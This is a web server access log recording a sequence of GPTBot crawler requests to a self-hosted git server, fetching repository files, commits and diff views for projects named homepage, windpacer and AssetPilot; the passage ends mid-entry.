"/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11706] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11682] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11705] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11708] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" +[17/Feb/2026:13:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" +[17/Feb/2026:13:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" +[17/Feb/2026:13:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 22471] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" +[17/Feb/2026:13:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" +[17/Feb/2026:13:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" +[17/Feb/2026:13:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:13:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 641] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:13:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..main" [Client 74.7.227.38] [Length 8376] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:13:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" +[17/Feb/2026:13:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker" [Client 74.7.227.38] [Length 190774] [Gzip 12.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup" [Client 74.7.227.38] [Length 105627] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" +[17/Feb/2026:13:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 11081] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" +[17/Feb/2026:13:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10721] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 695] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:13:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 697] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:13:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/wiki" [Client 74.7.227.38] [Length 7371] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" +[17/Feb/2026:13:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=docker-compose.yml" [Client 74.7.227.38] [Length 19565] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/docker-compose.yml" +[17/Feb/2026:13:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" +[17/Feb/2026:13:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12942] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 156395] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" +[17/Feb/2026:13:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:13:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:13:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services" +[17/Feb/2026:13:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13175] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" +[17/Feb/2026:13:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/semiyearly" [Client 74.7.227.38] [Length 8618] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/halfweekly" [Client 74.7.227.38] [Length 8371] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.gitignore" +[17/Feb/2026:13:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:13:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 156431] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 156438] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 156438] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 156428] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 74.7.227.38] [Length 14435] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 173143] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:13:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12972] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" +[17/Feb/2026:13:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:13:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 173148] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:35:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 173146] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 173141] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:35:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 